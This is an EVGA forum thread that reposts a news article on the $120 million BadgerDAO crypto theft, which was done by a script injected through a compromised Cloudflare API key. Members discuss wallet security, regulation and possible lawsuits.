BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack - EVGA Forums

Join us now!

Username
Password
Verification
	Stay logged in

Forgot Your Password? Forgot your Username? Haven't received registration validation E-mail?

Welcome, ! User Control Panel Log out

Forums
Posts

Latest Posts

Active Posts

Recently Visited

Search Results

View More
Blog

Recent Blog Posts

View More
Photos

Recent Photos

My Favorites

View More Photo Galleries
PMs

Unread PMs

Inbox

Send New PM View More
Page Extras
Menu
- Forum Themes

Mark Thread UnreadFlat Reading Mode ❐

BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack

Author Post Essentials Only Full Version
rjohnson11 EVGA Forum Moderator Total Posts : 102262 Reward points : 0 Joined: 2004/10/05 12:44:35 Location: Netherlands Status: offline Ribbons : 84 2021/12/03 00:24:37 (permalink) https://www.techpowerup.com/289569/badgerdao-sees-usd-120-million-crypto-heist-via-cloudflare-hack BadgerDAO, "one of the most security-minded DAOs in operation", has been hit with a cryptocurrency heist enabled via a JavaScript hack on their website. BadgerDAO enables Bitcoin holders to "bridge" their cryptocurrency over to the smart-contract and DeFi-enabled Ethereum platform via its token, thus allowing access to the world of decentralized finance. After preliminary investigations aided by blockchain security and data analytics Peckshield, it seems that the bad actors inserted a malicious script in the BadgerDAO website - in turn intercepting Web3 transactions and inserting a request to transfer the victim's tokens to the attacker's chosen address. It's currently estimated that around $120 million were siphoned off via this attack. A single transfer saw 896 Bitcoin being diverted this way - a cool $50 million. As soon as BadgerDAO became aware of suspect wallet activity, the company immediately froze all smart contracts running in its platform - a way to stem the bleeding until the security audit could be conducted. Thursday night, BadgerDAO announced it had "retained data forensics experts Chainalysis to explore the full scale of the incident & authorities in both the US & Canada have been informed & Badger is cooperating fully with external investigations as well as proceeding with its own." Acording to BadgerDAO, the attacker managed to access the Cloudflare API used by the company without triggering the two-factor authentication protection that should have been enabled. Of course, two-factor (or multi-factor) authentication can and has been subverted before; there have been multiple instances of phishing attempts that manage to cross the bridge over to 2FA keys, and there are even toolkits available that automate the entire process. While it's still one of the most cost-effective ways to increase security access whenever credentials are involved, like every security measure, it requires attentive user interactions. The poor security will probably open the door to lawsuits in my personal opinion. AMD Ryzen 9 7950X, Corsair Mp700 Pro M.2, 64GB Corsair Dominator Titanium DDR5 X670E Steel Legend, MSI RTX 4090 Associate Code: H5U80QBH6BH0AXF. I am NOT an employee of EVGA #1 18 Replies Related Threads
Hoggle EVGA Forum Moderator Total Posts : 10101 Reward points : 0 Joined: 2003/10/13 22:10:45 Location: Eugene, OR Status: offline Ribbons : 4 Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 03:03:54 (permalink) rjohnson11 https://www.techpowerup.com/289569/badgerdao-sees-usd-120-million-crypto-heist-via-cloudflare-hack BadgerDAO, "one of the most security-minded DAOs in operation", has been hit with a cryptocurrency heist enabled via a JavaScript hack on their website. BadgerDAO enables Bitcoin holders to "bridge" their cryptocurrency over to the smart-contract and DeFi-enabled Ethereum platform via its token, thus allowing access to the world of decentralized finance. After preliminary investigations aided by blockchain security and data analytics Peckshield, it seems that the bad actors inserted a malicious script in the BadgerDAO website - in turn intercepting Web3 transactions and inserting a request to transfer the victim's tokens to the attacker's chosen address. It's currently estimated that around $120 million were siphoned off via this attack. A single transfer saw 896 Bitcoin being diverted this way - a cool $50 million. As soon as BadgerDAO became aware of suspect wallet activity, the company immediately froze all smart contracts running in its platform - a way to stem the bleeding until the security audit could be conducted. Thursday night, BadgerDAO announced it had "retained data forensics experts Chainalysis to explore the full scale of the incident & authorities in both the US & Canada have been informed & Badger is cooperating fully with external investigations as well as proceeding with its own." Acording to BadgerDAO, the attacker managed to access the Cloudflare API used by the company without triggering the two-factor authentication protection that should have been enabled. Of course, two-factor (or multi-factor) authentication can and has been subverted before; there have been multiple instances of phishing attempts that manage to cross the bridge over to 2FA keys, and there are even toolkits available that automate the entire process. While it's still one of the most cost-effective ways to increase security access whenever credentials are involved, like every security measure, it requires attentive user interactions. The poor security will probably open the door to lawsuits in my personal opinion. I would wonder if lawsuits would really work since I don't think the United States or Canada is really ready to say bitcoin has value until it's sold for cash. The fact that most countries treat bitcoin as a digital item the same as say buying an item in a game means it's hard to see the case really awarding the value of the bitcoin. The same problem happens with collectibles in which someone could have a rare comic that goes for $700 but it can be considered only worth the original face value legally until it's been apprised. Use an Associates Code & SAVE 5% - 10% on your purchase. Just click on the associates banner to save, or enter the associates code at checkout on your next purchase. If you choose to use my code I want to personally say "Thank You" for using it. #2
Flint 1760 Omnipotent Enthusiast Total Posts : 8295 Reward points : 0 Joined: 2009/04/26 15:44:26 Status: offline Ribbons : 45 Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 04:19:45 (permalink) Cryptocurrency is just becoming another target and we will see increasing incidents. This, and the other thefts, should be a huge warning call to any firm in the business. Somehow I don't think this one will end up with the miscreants getting job offers. post edited by Flint 1760 - 2021/12/03 04:35:23 #3
Grey_Beard CLASSIFIED Member Total Posts : 2232 Reward points : 0 Joined: 2013/12/23 11:50:37 Location: The Land of Milk and Honey Status: offline Ribbons : 10 Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 04:26:59 (permalink) Another reason to stay away from cryptocurrency. Amazing that this keeps happening. But hey, you can track this stuff. LLLLOOOOOLLLLLLL! This stuff is made for criminals and no matter what anyone says, it is not secure nor is it traceable. It is definitely every criminal’s currency for sure. post edited by Grey_Beard - 2021/12/03 12:00:04 #4
ty_ger07 Insert Custom Title Here Total Posts : 21171 Reward points : 0 Joined: 2008/04/10 23:48:15 Location: traveler Status: online Ribbons : 270 Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 08:48:28 (permalink) It's funny how websites continue to cause cryptocurrency to be stolen when it is otherwise impossible to steal. When will this end? There should be money in it for someone who finds a solution. ASRock Z77 • Intel Core i7 3770K • EVGA GTX 1080 • Samsung 850 Pro • Seasonic PRIME 600W Titanium My EVGA Score: 1546 • Zero Associates Points • I don't shill #5
nomoss FTW Member Total Posts : 1559 Reward points : 0 Joined: 2009/04/04 19:45:27 Status: offline Ribbons : 7 Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 08:56:57 (permalink) All the tears I shed for people losing their environment destroying "currency" could fit on the head of a pin. Associates code: 9OYA1P1FRHQ3SGN Imgur modsrigs: Chemical X RedWing Utonium TY for the +1s! #6
Miguell FTW Member Total Posts : 1112 Reward points : 0 Joined: 2008/04/16 14:43:51 Location: Portugal Status: offline Ribbons : 0 Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 09:24:30 (permalink) nomoss All the tears I shed for people losing their environment destroying "currency" could fit on the head of a pin. you and me both unfortunately people want easy money,. its and old human desire ! crypto provides just that and it wont die .. as a matter of fact i believe most of the people who lost big chuncks of their savings, will enter the crypto market again... as soon as they can.. already saw a documentary about this.. and they admit that despite losing they would try again because.... its easy money! greed will beat the will to have a 9 to 5 job for 40 years any day... post edited by Miguell - 2021/12/03 14:40:53 Case: Cooler Master Stacker 830 Display: 32" AOC Q3279VWFD8 @2560x1440@75Hz Cpu: Intel Core i7-8700 Cpu Cooler: Cooler Master - MasterLiquid ML120L - RGB Mobo: Asus ROG Strix Z390-H Gaming Vga: Asus Dual RTX 4060 Ti 16GB Advanced Edition Ram: 32GB DDR4 G.SKILL - RIPJAWS V @3200Mhz Sound: Hama uRage soundZbar 2.1 Unleashed - (Optical) Storage: 500GB SSD M.2 A2000 NVMe Kingston (OS) + 8TB (4+4) HDD X300 Toshiba (Data) Psu: SeaSonic M12 700W Os: W10 Pro 64Bit #7
Grey_Beard CLASSIFIED Member Total Posts : 2232 Reward points : 0 Joined: 2013/12/23 11:50:37 Location: The Land of Milk and Honey Status: offline Ribbons : 10 Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 12:01:42 (permalink) ty_ger07 It's funny how websites continue to cause cryptocurrency to be stolen when it is otherwise impossible to steal. When will this end? There should be money in it for someone who finds a solution. Eventually you will realize the money is in the theft not stopping it. You mention this is impossible to steal while posting in a thread about it getting stolen. Hmmm. #8
kram36 The Destroyer Total Posts : 21477 Reward points : 0 Joined: 2009/10/27 19:00:58 Location: United States Status: offline Ribbons : 72 Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 13:02:40 (permalink) Grey_Beard ty_ger07 It's funny how websites continue to cause cryptocurrency to be stolen when it is otherwise impossible to steal. When will this end? There should be money in it for someone who finds a solution. Eventually you will realize the money is in the theft not stopping it. You mention this is impossible to steal while posting in a thread about it getting stolen. Hmmm. If you keep your digital assets in your own reputable private wallet and don't store the passkey where someone can find it on your pc, it's pretty much impossible to steal. A cold storage wallet, you're pretty much golden. Leaving your digital assets on a website is not a smart move. post edited by kram36 - 2021/12/03 13:07:19 #9
ty_ger07 Insert Custom Title Here Total Posts : 21171 Reward points : 0 Joined: 2008/04/10 23:48:15 Location: traveler Status: online Ribbons : 270 Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 13:36:31 (permalink) Grey_Beard ty_ger07 It's funny how websites continue to cause cryptocurrency to be stolen when it is otherwise impossible to steal. When will this end? There should be money in it for someone who finds a solution. Eventually you will realize the money is in the theft not stopping it. You mention this is impossible to steal while posting in a thread about it getting stolen. Hmmm. When you give it to someone else, it can be stolen. If you keep it, to yourself, it is impossible to steal. It gets stolen when a service you use to buy, sell, or transfer it doesn't safely guard the keys they use, an inside job happens, or when someone tricks you into transferring it to the wrong person. Every one of these thefts fall under one or more of those categories. It is impossible to steal in the conventional sense. ASRock Z77 • Intel Core i7 3770K • EVGA GTX 1080 • Samsung 850 Pro • Seasonic PRIME 600W Titanium My EVGA Score: 1546 • Zero Associates Points • I don't shill #10
castrator86 SSC Member Total Posts : 816 Reward points : 0 Joined: 2010/07/24 09:33:21 Status: offline Ribbons : 2 Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 13:37:44 (permalink) kram36 Grey_Beard ty_ger07 It's funny how websites continue to cause cryptocurrency to be stolen when it is otherwise impossible to steal. When will this end? There should be money in it for someone who finds a solution. Eventually you will realize the money is in the theft not stopping it. You mention this is impossible to steal while posting in a thread about it getting stolen. Hmmm. If you keep your digital assets in your own reputable private wallet and don't store the passkey where someone can find it on your pc, it's pretty much impossible to steal. A cold storage wallet, you're pretty much golden. Leaving your digital assets on a website is not a smart move. Bingo. Unless you store it on a USB key back in 2009 while at college and then lose it... It pains me to look at BC prices knowing I had a 3 or 4 on a USB drive that got dropped/lost/thrown out. #11
Hoggle EVGA Forum Moderator Total Posts : 10101 Reward points : 0 Joined: 2003/10/13 22:10:45 Location: Eugene, OR Status: offline Ribbons : 4 Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/03 14:28:28 (permalink) Miguell nomoss All the tears I shed for people losing their environment destroying "currency" could fit on the head of a pin. you and me both unfortunately people want easy money,. its and old human desire ! crypto provides just that and it wont die .. as a matter of fact i believe most of the people who lost big chucks of their savings... will enter the crypto market again... as soon as they can.. already saw a documentary about this.. and they admit that despite losing they would try again because.... its easy money! greed will beat the will to have a 9 to 5 job for 40 years any day... I agree that it's greed that will beat having a regular job but I also feel crypto probably has a lot of backing by illegal organized criminal activity and that backing could help keep the prices up instead of dropping as it's easy to transfer crypto compared to cash across borders. Use an Associates Code & SAVE 5% - 10% on your purchase. Just click on the associates banner to save, or enter the associates code at checkout on your next purchase. If you choose to use my code I want to personally say "Thank You" for using it. #12
Nereus Captain Goodvibes Total Posts : 18916 Reward points : 0 Joined: 2009/04/09 20:05:53 Location: Brooklyn, NYC. Status: online Ribbons : 58 Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/05 11:15:22 (permalink) Soon as Bitcoin and other cryptocurrencies are recognized as official legal tender (like El Salvador has), then this effectively becomes a very large bank heist. People who hack into and rob banks get serious jail time. The same should apply for crypto. Until then, it's basically a digital California - take whatever you want, nobody is going to do anything about it other than maybe give a light smack on the hand for being naughty, and for the victims.. cry me a river. BUILD 1 2 \| MINI-ITX BUILD \| MODSRIGS $1K WIN \| HEATWARE 111-0-0 \| ASSOCIATE CODE CSKKXUT5Q9GVAFR #13
Miguell FTW Member Total Posts : 1112 Reward points : 0 Joined: 2008/04/16 14:43:51 Location: Portugal Status: offline Ribbons : 0 Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/05 12:48:44 (permalink) Nereus Soon as Bitcoin and other cryptocurrencies are recognized as official legal tender (like El Salvador has), then this effectively becomes a very large bank heist. People who hack into and rob banks get serious jail time. The same should apply for crypto. Until then, it's basically a digital California - take whatever you want, nobody is going to do anything about it other than maybe give a light smack on the hand for being naughty, and for the victims.. cry me a river. you maybe right.. it SHOULD be recognized... at least BC should because its the oldest one! but who is gonna recognize it and most important WHO is gonna regulate all this digital cash flow around the world?? we are talking tons and tons of money ( zeros and ones) flowing everyday between servers and countries! crypto has no country and knows no borders! i'm not sure how this would be regulated... Case: Cooler Master Stacker 830 Display: 32" AOC Q3279VWFD8 @2560x1440@75Hz Cpu: Intel Core i7-8700 Cpu Cooler: Cooler Master - MasterLiquid ML120L - RGB Mobo: Asus ROG Strix Z390-H Gaming Vga: Asus Dual RTX 4060 Ti 16GB Advanced Edition Ram: 32GB DDR4 G.SKILL - RIPJAWS V @3200Mhz Sound: Hama uRage soundZbar 2.1 Unleashed - (Optical) Storage: 500GB SSD M.2 A2000 NVMe Kingston (OS) + 8TB (4+4) HDD X300 Toshiba (Data) Psu: SeaSonic M12 700W Os: W10 Pro 64Bit #14
ty_ger07 Insert Custom Title Here Total Posts : 21171 Reward points : 0 Joined: 2008/04/10 23:48:15 Location: traveler Status: online Ribbons : 270 Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/05 19:13:11 (permalink) Miguell crypto has no country and knows no borders! i'm not sure how this would be regulated... It's regulated in the United States. It is probably regulated in many other countries too. In the United States at least, it's more a matter of enforcement and choosing to follow regulation. KYC laws, AML laws, tax laws, and the patriot act pretty well have cryptocurrency fully regulated in the United States. ASRock Z77 • Intel Core i7 3770K • EVGA GTX 1080 • Samsung 850 Pro • Seasonic PRIME 600W Titanium My EVGA Score: 1546 • Zero Associates Points • I don't shill #15
Grey_Beard CLASSIFIED Member Total Posts : 2232 Reward points : 0 Joined: 2013/12/23 11:50:37 Location: The Land of Milk and Honey Status: offline Ribbons : 10 Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/06 13:59:13 (permalink) Seems they have resorted to begging. I guess it’s secure if you include successful begging. The crypto-calamity continues. “Now, the blockchain "bridge" protocol BadgerDAO is pleading with the hacker to return the stolen funds.” https://www.vice.com/en/a...turn-dollar119-million post edited by Grey_Beard - 2021/12/06 14:25:20 #16
Nereus Captain Goodvibes Total Posts : 18916 Reward points : 0 Joined: 2009/04/09 20:05:53 Location: Brooklyn, NYC. Status: online Ribbons : 58 Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/06 14:13:45 (permalink) Wow.. $120m stolen from BadgerDAO, then $150m from BitMart.. Seems safer to just stuff your mattress with cash. BUILD 1 2 \| MINI-ITX BUILD \| MODSRIGS $1K WIN \| HEATWARE 111-0-0 \| ASSOCIATE CODE CSKKXUT5Q9GVAFR #17
Flint 1760 Omnipotent Enthusiast Total Posts : 8295 Reward points : 0 Joined: 2009/04/26 15:44:26 Status: offline Ribbons : 45 Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/06 15:26:12 (permalink) If they have resorted to begging, then you know they have some real problems. Might work better to offer a "finders fee" and a six figure salary job as was done a couple of months ago after a theft. #18
ty_ger07 Insert Custom Title Here Total Posts : 21171 Reward points : 0 Joined: 2008/04/10 23:48:15 Location: traveler Status: online Ribbons : 270 Re: BadgerDAO Sees $120 Million Crypto Heist via Cloudflare Hack 2021/12/06 20:14:59 (permalink) Nereus Wow.. $120m stolen from BadgerDAO, then $150m from BitMart.. Seems safer to just stuff your mattress with cash. Or keep it in a crypto wallet and not move it around. ASRock Z77 • Intel Core i7 3770K • EVGA GTX 1080 • Samsung 850 Pro • Seasonic PRIME 600W Titanium My EVGA Score: 1546 • Zero Associates Points • I don't shill #19

Jump to:

Back to Mobile